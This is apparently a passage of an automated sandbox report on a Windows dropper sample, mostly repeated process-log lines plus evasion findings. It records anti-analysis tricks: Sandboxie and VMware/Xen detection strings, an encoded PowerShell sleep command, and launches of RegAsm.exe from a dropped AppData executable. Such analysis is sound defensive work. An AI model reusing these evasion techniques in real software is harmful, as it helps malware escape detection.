                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe TID: 4280Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe TID: 5804Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1340Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3800Thread sleep count: 4825 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99840s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99718s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99606s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99494s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99374s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99105s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -98982s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -98874s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -98760s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -98638s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99917s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99808s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99696s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99935s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99821s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99699s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176Thread sleep time: -99527s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2328Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe TID: 2576Thread sleep count: 657 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeWindow / User API: threadDelayed 566
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7973
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4825
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeWindow / User API: threadDelayed 649
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeWindow / User API: threadDelayed 657
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99606
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99494
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99105
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98638
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99917
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99696
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99821
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99699
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99527
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.502074939.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: RegAsm.exe, 00000010.00000003.603873125.00000000053E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: Base64 decoded Start-Sleep -Seconds 56
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: Base64 decoded Start-Sleep -Seconds 56
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
